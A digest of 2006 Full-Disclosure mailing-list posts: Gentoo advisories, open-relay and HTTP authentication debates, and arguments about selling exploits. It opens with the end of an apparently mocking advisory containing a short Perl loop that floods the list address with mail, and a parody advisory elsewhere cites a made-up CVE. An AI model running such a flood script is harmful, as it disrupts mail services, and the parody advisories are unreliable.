## greetz 2 # weev, hep, hugparty, bob, tosh, choob,# krade, the church of jesus christ of latter-day saints,# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT, # u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;use strict;use Mail::Sendmail;my %mail = ( from => '[EMAIL PROTECTED]', to => '
full-disclosure@lists.grok.org.uk', subject => 'SMTP FLOOD PoC',);while (1) {  sendmail(%mail);}==A. References==RFC 821==B. Contact
==Jmax, Bantown Security, INC. [EMAIL PROTECTED]1-888-565-9428GSAE GREM SSP-CNSA CAP SSCP
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=%Buffer Overflow in Microsoft Access

[Valdis . Kletnieks]

On Fri, 17 Mar 2006 20:14:35 GMT, Dave Korn said:

>   Ah, well, that wasn't exactly obvious from the Received header that you 
> posted, now was it?!  Heh, that was one vital piece of info without which 
> nobody could be sure they understood exactly what it was that you were 
> showing us.  I thought it might have been a quote from one of the headers of 
> one of the spams!

Actually, the fact that the Received: header showed that the toad.com machine
accepted the mail, combined with the fact that it then forwarded the mail
to the list (else we'd not have *seen* the Received: in question), combine to
tell us one of 3 things:

1) Somebody telnet'ed to the *next* machine's port 25 and forged that Received:
line (somewhat unlikely, as that box said 'received from toad.com').  Of course,
you can only *really* trust headers added by boxes you control, but in this case
things look fairly kosher up to where lists.grok.org.uk accepts the mail, and
there's no obvious reason to disbelieve its Received: line.

2) The entity giving it to toad.com performed some variant of SMTP AUTH,
convincing toad.com they were a legitimate user and allowed to relay outbound.

3) It's an open relay/proxy.

Incidentally, the single Received: line I posted was actually for the
German Tor box rather than toad.com. :)


pgpBe6di4XU4r.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=%Buffer Overflow in Microsoft Access

[Dave Korn]

leToff wrote:
> Dave Korn wrote :
>
>>  I don't see how you could tell from that received header whether the
>> machine is a proxy, or whether it originated the traffic itself.
>>
>>
> Simply because I sent that message myself using telnet connected to
> the 1st MX of toad.com (not tested the 2nd).

  Ah, well, that wasn't exactly obvious from the Received header that you 
posted, now was it?!  Heh, that was one vital piece of info without which 
nobody could be sure they understood exactly what it was that you were 
showing us.  I thought it might have been a quote from one of the headers of 
one of the spams!

> It's so easy to verify by
> yourself that I don't understand why you don't trust me.

  Oh, I do believe you; I was just pointing out that the evidence you were 
showing was insufficiently clear/complete.

> BTW, Open Relay is propably more appropriate to define this machine.

  The toad machine certainly is an open relay, the one that was connecting 
to it is an anonymising mix-proxy.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: HTTP AUTH BASIC monowall

[Dave Korn]

Jason Coombs wrote:
>> Brian Eaton wrote:
>>> I'd like to see their process
>>> changed so that it included a more
>>> serious check into the business
>>> whose web site they are verifying.
>>
>> This makes no sense at all, and is simply impossible within the DNS
>> system. Furthermore, all verification done by any CA can be easily
>> fooled.

  That may be the case in practice, but it's surely not an absolute 
theoretical limitation?  I would have thought it should be perfectly 
/possible/ to set up a CA that really did do a good job; that wouldn't issue 
a certificate except in person, that insists on sending one of the CA's 
staff round to the subscriber's business premises to meet them personally, 
look at the buildings, look at whether it's an established business with a 
history of trading, ask to see customer testimonials, etc. etc.

  It might still be possible to fool them but it would suddenly require you 
to hire a bunch of actors, rent business premises, forge dozens of copies of 
old newspapers to look like you've been in existence and advertising for 
some years it's suddenly a /much/ steeper barrier than some stupid 
automated system that some stupid skiddie can email from some stupid open 
proxy.

  And of course that's the real reason why CA verification can be defeated: 
not because there's some technical, logical, social or moral impossibility 
about it; merely because automation is cheap and the corporations that 
perform it are cheapskates who care only about the bottom line and don't 
mind providing a shit service that fails to fulfill its requirements.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Jason]

I do not think that digest over basic is really going to help in the
MITM case either since the attacker that can successfully pull off the
SSL MITM he controls the connection. Digest avoids disclosing the actual
password but it does not necessarily prevent the attacker from changing
it. The attacker can now not only access the system impersonating you
but hijack it from you just as if he had the actual password.

Digest also does not prevent the attacker in this case from presenting
the client with data that produces a reversible or discoverable text
thereby recovering an _effective_ password.


"
   Like Basic Access Authentication, the Digest scheme is based on a
   simple challenge-response paradigm. The Digest scheme challenges
   using a nonce value. A valid response contains a checksum (by
   default, the MD5 checksum) of the username, the password, the given
   nonce value, the HTTP method, and the requested URI. In this way, the
   password is never sent in the clear. Just as with the Basic scheme,
   the username and password must be prearranged in some fashion not
   addressed by this document.
"

The attacker now needs to provide a nonce and wait for the reply. The
ability to control data that will be used in the hash is key to making
it potentially successful. The nonce, username, HTTP method, and URI
will all be known at this point. Now the attacker only needs to find a
hash collision with _any_ password that satisfies the checksum and the
game is again over.

http://www.stachliu.com/collisions.html

New average run time on P4 1.6ghz PC - 45 minutes

I don't think that the attacker needs to actually launch a collision
attack because they have all but one component used in the hash. Now the
attacker only need to launch a dictionary attack against the provided
hash and they likely will find the result.

Given that the attacker controls the connection they can learn the
requisite details by observing normal interaction and producing a
precomputed hash table with the nonce they plan on providing. This could
result in a near real-time compromise of the password when an actual
attack is launched.

A solution that requires another successful MITM is required to add any
real complexity to the equation. The solution must introduce a
computational complexity that removes the precomputed and known text
attack vectors. Any solution that does not is ultimately no better when
considered in the context of a successful MITM. Digest raises the bar a
little more but I do not think it will solve the problem.

Simon Smith wrote:
> Thanks felix!
> 
> Felix Lindner wrote:
> 
>>Hi,
>>
>>On Thu, 16 Mar 2006 09:48:07 -0500
>>Simon Smith <[EMAIL PROTECTED]> wrote:
>>  
>>
>>>My first thought was on how to harden the
>>>authentication because the basic auth didn't cut it for me. Thats what I
>>>am looking for ideas for.
>>>
>>
>>you may be looking for Digest Authentication:
>>http://www.ietf.org/rfc/rfc2617.txt:
>>
>>   "Like Basic, Digest access authentication verifies that both parties
>>   to a communication know a shared secret (a password); unlike Basic,
>>   this verification can be done without sending the password in the
>>   clear, which is Basic's biggest weakness. As with most other
>>   authentication protocols, the greatest sources of risks are usually
>>   found not in the core protocol itself but in policies and procedures
>>   surrounding its use."
>>
>>cheers
>>FX
>>
>>  
> 
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200603-16 ] Metamail: Buffer overflow

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Metamail: Buffer overflow
  Date: March 17, 2006
  Bugs: #126052
ID: 200603-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in Metamail could possibly be exploited to execute
arbitrary code.

Background
==

Metamail is a program that decodes MIME encoded mail.

Affected packages
=

---
 Package/Vulnerable/Unaffected
---
  1  net-mail/metamail  < 2.7.45.3-r1   >= 2.7.45.3-r1

Description
===

Ulf Harnhammar discovered a buffer overflow in Metamail when processing
mime boundraries.

Impact
==

By sending a specially crafted email, attackers could potentially
exploit this vulnerability to crash Metamail or to execute arbitrary
code.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Metamail users should update to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/metamail-2.7.45.3-r1"

References
==

  [ 1 ] CVE-2006-0709
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0709

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpfwZ5QdDVMP.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities

[crazy frog crazy frog]

hi list,
we need to test the protocol decoding ability of ids/ips.any idea or
link to any resource,tool will be greatly apreicated.
thanks for your help in advace,
CF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200603-15 ] Crypt::CBC: Insecure initialization vector

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: Crypt::CBC: Insecure initialization vector
  Date: March 17, 2006
  Bugs: #126048
ID: 200603-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Crypt::CBC uses an insecure initialization vector, potentially
resulting in a weaker encryption.

Background
==

Crypt::CBC is a Perl module to encrypt data using cipher block chaining
(CBC).

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  dev-perl/crypt-cbc   < 2.17   >= 2.17

Description
===

Lincoln Stein discovered that Crypt::CBC fails to handle 16 bytes long
initializiation vectors correctly when running in the RandomIV mode,
resulting in a weaker encryption because the second part of every block
will always be encrypted with zeros if the blocksize of the cipher is
greater than 8 bytes.

Impact
==

An attacker could exploit weak ciphertext produced by Crypt::CBC to
bypass certain security restrictions or to gain access to sensitive
data.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Crypt::CBC users should upgrade to the latest available version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-perl/crypt-cbc-2.17"

References
==

  [ 1 ] CVE-2006-0898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0898

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-15.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpEE4KxSXdEA.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200603-14 ] Heimdal: rshd privilege escalation

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Heimdal: rshd privilege escalation
  Date: March 17, 2006
  Bugs: #121839
ID: 200603-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An error in the rshd daemon of Heimdal could allow authenticated users
to elevate privileges.

Background
==

Heimdal is a free implementation of Kerberos 5.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  app-crypt/heimdal   < 0.7.2  >= 0.7.2

Description
===

An unspecified privilege escalation vulnerability in the rshd server of
Heimdal has been reported.

Impact
==

Authenticated users could exploit the vulnerability to escalate
privileges or to change the ownership and content of arbitrary files.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Heimdal users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-crypt/heimdal-0.7.2"

References
==

  [ 1 ] CAN-2006-0582
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-0582
  [ 2 ] Heimdal Advisory 2006-02-06
http://www.pdc.kth.se/heimdal/advisory/2006-02-06/

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpF7Z7y5zouL.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Simon Smith]

Thanks felix!

Felix Lindner wrote:
> Hi,
>
> On Thu, 16 Mar 2006 09:48:07 -0500
> Simon Smith <[EMAIL PROTECTED]> wrote:
>   
>> My first thought was on how to harden the
>> authentication because the basic auth didn't cut it for me. Thats what I
>> am looking for ideas for.
>> 
>
> you may be looking for Digest Authentication:
> http://www.ietf.org/rfc/rfc2617.txt:
>
>"Like Basic, Digest access authentication verifies that both parties
>to a communication know a shared secret (a password); unlike Basic,
>this verification can be done without sending the password in the
>clear, which is Basic's biggest weakness. As with most other
>authentication protocols, the greatest sources of risks are usually
>found not in the core protocol itself but in policies and procedures
>surrounding its use."
>
> cheers
> FX
>
>   


-- 
Regards, 
Jackass


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Simon Smith]

Brian,
I fully agree and thanks for the references. My next step after I'd
found a good solution was going to be focusing in the session security. 
Thanks for the input/help man. I appreciate it!

Brian Eaton wrote:
> Simon Smith simon at snosoft.com wrote
>   
>> My first thought was on how to harden the
>> authentication because the basic auth didn't cut it for me. Thats what I
>> am looking for ideas for.
>> 
>
> Here are some things to start with:
>
> Client certificates.
> Kerberos.
> Two-factor authentication.
>
> Unfortunately with web applications you not only need to worry about
> the initial authentication, but how the session is maintained.  If the
> session is maintained using cookies, all the strong authentication in
> the world won't save you from having that session hijacked.
>
> - Brian
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>   


-- 
Regards, 
Jackass


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200603-13 ] PEAR-Auth: Potential authentication bypass

[Stefan Cornelius]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200603-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: PEAR-Auth: Potential authentication bypass
  Date: March 17, 2006
  Bugs: #123832
ID: 200603-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


PEAR-Auth did not correctly verify data passed to the DB and LDAP
containers, thus allowing to inject false credentials to bypass the
authentication.

Background
==

PEAR-Auth is a PEAR package that provides methods to create a PHP based
authentication system.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-php/PEAR-Auth   < 1.2.4  >= 1.2.4

Description
===

Matt Van Gundy discovered that PEAR-Auth did not correctly validate
data passed to the DB and LDAP containers.

Impact
==

A remote attacker could possibly exploit this vulnerability to bypass
the authentication mechanism by injecting specially crafted input to
the underlying storage containers.

Workaround
==

There is no known workaround at this time.

Resolution
==

All PEAR-Auth users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-php/PEAR-Auth-1.2.4"

References
==

  [ 1 ] CVE-2006-0868
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0868

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-13.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgp8e5Qr8c9x3.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Brian Eaton]

On 3/16/06, Felix Lindner <[EMAIL PROTECTED]> wrote:
> you may be looking for Digest Authentication:
> http://www.ietf.org/rfc/rfc2617.txt:
>
>"Like Basic, Digest access authentication verifies that both parties
>to a communication know a shared secret (a password); unlike Basic,
>this verification can be done without sending the password in the
>clear, which is Basic's biggest weakness. As with most other
>authentication protocols, the greatest sources of risks are usually
>found not in the core protocol itself but in policies and procedures
>surrounding its use."

Digest probably isn't a good answer to a MITM attack, because as far
as I can tell there is nothing stopping the MITM from downgrading to
BA.

I haven't actually tested this.  Maybe the browsers have config
options to disable BA authentication, or at least give some kind of
visual indicator that the authentication is digest rather than basic.

- Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[Valdis . Kletnieks]

On Fri, 17 Mar 2006 11:33:30 EST, gboyce said:

> The Redhat case is different.  They are distributing software that they 
> are licensed to distribute in a for-pay manner (the GPL allows for the 
> sale of software as long as you don't restrict the rights granted by the 
> GPL).

In addition, if you're paying RedHat money, you're not paying for the software,
you're paying for a maintenance contract - what you're getting there is a copy
of the software packaged so it can be installed easily, the ability to call
RedHat for technical support, and updates.  If you dig around, you can find all
the pieces you need to do a totally free Linux-from-scratch from RedHat - but
you'll have to do it on your own, as they won't help or even answer the phone.

If you order the software on CD, they attach a small media charge, also
permitted by the GPL.


pgpyg34DSduVX.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[Valdis . Kletnieks]

On Fri, 17 Mar 2006 08:44:10 +0100, Michal Zalewski said:
> On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:
> 
> > If you puplish something without a license it is OPEN DOMAIN
> > That means people can use it, modify it, sell it...
> 
> That's nonsense. If I publish a book or a photo or a newspaper article
> without a lengthy license attached, you can copy it at will, too? The
> requirement of a license or a copyright notice is a long-running myth - it
> is good to have these, but they are not a legal requirement.

In most countries that have copyright laws aligned with the Bern Convention,
all works are automatically copyrighted at the time of creation (in the US,
this applies to works created after 1978 - for pre-78, contact a good copyright
lawyer).  However, under US law, failing to attach a proper copyright notice,
and more importantly registering the work with the US Copyright Office, means
that the copyright holder is unable to claim certain damages (basically, you
can't get money from the offender, but you can still get them to stop
infringing).

For the US, the gory details are all in the US Code, Title 17.

However, Michal is correct in that barring an explicit agreement (such as
code that's GPL, or a Creative Commons license, or other such), in most of the
civilized world, anything found online should be assumed to be copyrighted, and
you better hope some variant of "fair use" covers your use of the material.

This is a big legal quagmire that nobody wants to create a test case for - in
fact, in the US, I don't believe any court has yet decisively ruled whether
the act of downloading a webpage from a server (thus creating a locally cached
copy) is covered under "fair use".  17 USC 117 (a)(1) discusses the copy of
a program that's created when loading it into RAM, but it's pretty specific
to "the owner of a computer program" (incidentally, this is problematic in
US states that signed UCITA, as software is considered leased, not sold, so
you're not the owner of the software).


pgp5jkzpwJA5X.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[gboyce]

On Fri, 17 Mar 2006, Steven Rakick wrote:


Give me a break.

If I discovered a technique for turning copper into
gold and published it on FD, would you consider it
unethical for someone with more business sense to make
money off of it?

Look at Redhat...


The Redhat case is different.  They are distributing software that they 
are licensed to distribute in a for-pay manner (the GPL allows for the 
sale of software as long as you don't restrict the rights granted by the 
GPL).


From what I've heard so far, FrSIRT is selling information and code that 

was not distributed under a clear license.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[Steven Rakick]

Give me a break. 

If I discovered a technique for turning copper into
gold and published it on FD, would you consider it
unethical for someone with more business sense to make
money off of it?

Look at Redhat...

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSN Passport Cert improperly issued

[Tim]

Do you have any idea how many people are subscribed to this list?  When
you attach even a slightly large file to your emails, you amplify that
traffic several hundred(thousand?)-fold.  Many people on the list may
not give a shit about your post. (Although this one is moderately
interesting.)  It is just a big waste of bandwidth for this free
service.

Please be polite and post your jpg to your website, and provide a link.
Email was never intended for file transfer in the first place, and isn't
particularly efficient at it.

thanks,
tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [ADVISORY] # =Thu Mar 16 21:01:59 EST 2006= # Heap Overflow in Ethereal

[bigdaddyzeroday]

They should do better by put valid looking CVE and info.  That be 
funny.

On Thu, 16 Mar 2006 18:02:04 -0800 [EMAIL PROTECTED], 
[EMAIL PROTECTED] wrote:
>[ADVISORY] # =Thu Mar 16 21:01:59 EST 2006= # Heap Overflow in 
>Ethereal
>
>
>
>
>8=D~~
>1. HISTORY
>8=D~~
>20/1/2006 - Vendor Notification.
>16/3/2006 - Public Disclosure.
>8=D~~
>2. CVE INFORMATION
>8=D~~
>The Common Vulnerabilities and Exposures (CVE) project has 
>assigned the name CVE-2006-820356 to this issue
>
>
>
>8=D~~
>CONTACT
>8=D~~
>[EMAIL PROTECTED] [EMAIL PROTECTED]
>1-888-565-9428
>
>CISSP GSAE CEH CSFA GREM SSP-MPA GWAS SSCP 
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[bigdaddyzeroday]

They not write these themself.  Not nice to make money from other 
works.  I submit exploit to FRSIRT do I get money?



On Thu, 16 Mar 2006 16:06:55 -0800 "Ivan ." <[EMAIL PROTECTED]> 
wrote:
>http://www.eweek.com/article2/0,1895,1938511,00.asp
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What about subscriber only?

[bigdaddyzeroday]

Like it is now?  Get grip.  It easy to dump list subscriber and use 
to seed spam mail to pass post rules.

On Thu, 16 Mar 2006 16:05:34 -0800 Chris Umphress 
<[EMAIL PROTECTED]> wrote:
>On 3/16/06, Steve Friedl <[EMAIL PROTECTED]> wrote:
>> On Thu, Mar 16, 2006 at 09:32:11PM +0100, Stefan Triller wrote:
>> > my killfile is getting bigger and bigger, because of the spam 
>on this list.
>> > What about closing this list for email adresses which aren't 
>subscribed to it?
>> > This would minimize the spam.
>>
>> Then the spam would simply come "from" list subscribers :-(
>
>But then it would all be coming from one or two addresses. It's 
>easier
>to delete that way.
>
>--
>Chris Umphress 
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down account information

[bigdaddyzeroday]

Do you blow everything out of perportion like this?  How old must 
you be to have this attitude.

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group 
<[EMAIL PROTECTED]> wrote:
>You're Yahoo's top security advisor, who I talk to every day off 
>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON 
>ONLINE FORMS?
>   
>  I think you're missing the point. The account information YAHOO 
>ask users to print out is the ACTUAL information on the users 
>ACCOUNT table.
>   
>  SURE, folks can type COMPLETE crap in their registeration for 
>signing upto a Yahoo account, but whatever information is 
>submitted to the Yahoo account, it is the TRUE information that 
>would give access to that account.
>   
>  SO, no matter the trend of users giving BOGUS information to 
>sign up for an account, the only people who would print out 
>information is people who would have submitted TRUE information. 
>Otherwise, why would they print out info they knew was bogus?
>   
>  MARK, you're Yahoo's top security advisor, and I respect you off 

>the record, but coming on here trying to defend Yahoo's sec pros 
>for getting it totally wrong in their CONTRADICTION between sites 
>is totally wrong.
>   
>  Yahoo said the wording  "DONT WRITE DOWN YOUR PASSWORD" but on 
>the registeration proceedure it says "YAHOO RECOMMEND YOU WRITE 
>DOWN YOUR ACCOUNT INFORMATION"
>   
>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A 
>CORPORATION GOT IT WRONG.
>   
>  I speak to you every day off list, but going off on your own 
>crusade won't make the rest of the Yahoo security team like you 
>better.
>   
>  SEE YOU OFF LIST SEIDEN.
>   
>  Sorry to everyone else, this is part of an off list argument 
>that Yahoo's top advisor can't get a grip of.
>   
>  (How did you become Yahoo's top security advisor? :P)
>  SEE YOU OFF LIST
>  Bye
>   
>   
>   
>   
>  [EMAIL PROTECTED] wrote:
>a certain number of people lie about their birthdate and 
>zipcode, or
>they forget just what they lied about, or move from place to
>place and forgot where they lived when they registered, 
>and they don't have a working alternate email address.
>
>   
>-
> Yahoo! Mail
> Use Photomail to share photos without annoying attachments.



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down account information

[bigdaddyzeroday]

Bank in my country do not have printout even on web page when doing 
banking just 4 digit.

On Thu, 16 Mar 2006 09:57:17 -0800 [EMAIL PROTECTED] wrote:
>On Thu, 16 Mar 2006 06:21:14 PST, n3td3v group said:
>> The issue of printouts isn't a problem for home users as the 
>other poster
>> mentioned, The threat comes more in small business and large 
>corporations.
>
>Actually, the issue of printouts *is* a problem for home users - 
>dumpster diving
>is a major source of identity theft.  The single biggest leakage 
>is all those
>credit card applications you turned down, just due to the sheer 
>volume.  However,
>if the diver can score a printout from your online banking, 
>they're probably golden,
>because then they have name, address, and probably account number 
>all right there.



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall

[Tim]

Hi,

> Don't get me wrong, there's obvious value in the certificate system.  
> Because I waxed philosophical about webs of trust doesn't mean I want to 
> throw the baby out with the bathwater.  :)

Heh, ok, we're on the same page then.  I was referring to the PGP web of
trust, since I'm not familiar with the marketing of the SSL one.  Indeed
you are right that people associate the wrong kind of trust with even
